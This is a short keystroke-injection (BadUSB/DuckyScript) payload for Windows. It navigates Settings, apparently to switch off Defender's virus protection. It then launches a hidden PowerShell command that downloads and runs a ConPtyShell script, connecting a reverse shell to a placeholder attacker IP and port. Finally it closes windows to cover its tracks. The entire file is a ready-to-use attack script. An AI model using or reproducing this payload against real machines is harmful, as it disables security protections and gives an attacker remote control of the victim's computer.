GUI I
DELAY 1200
STRING virus
DELAY 600
DOWNARROW
DELAY 500
ENTER
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
SPACE
DELAY 500
LEFTARROW
DELAY 500
ENTER
DELAY 100
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 200
STRING PowerShell.exe -windowstyle hidden IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell HACKERIP PORT
ENTER
DELAY 100
ALT TAB
DELAY 100
ALT f4
DELAY 100 
ALT f4
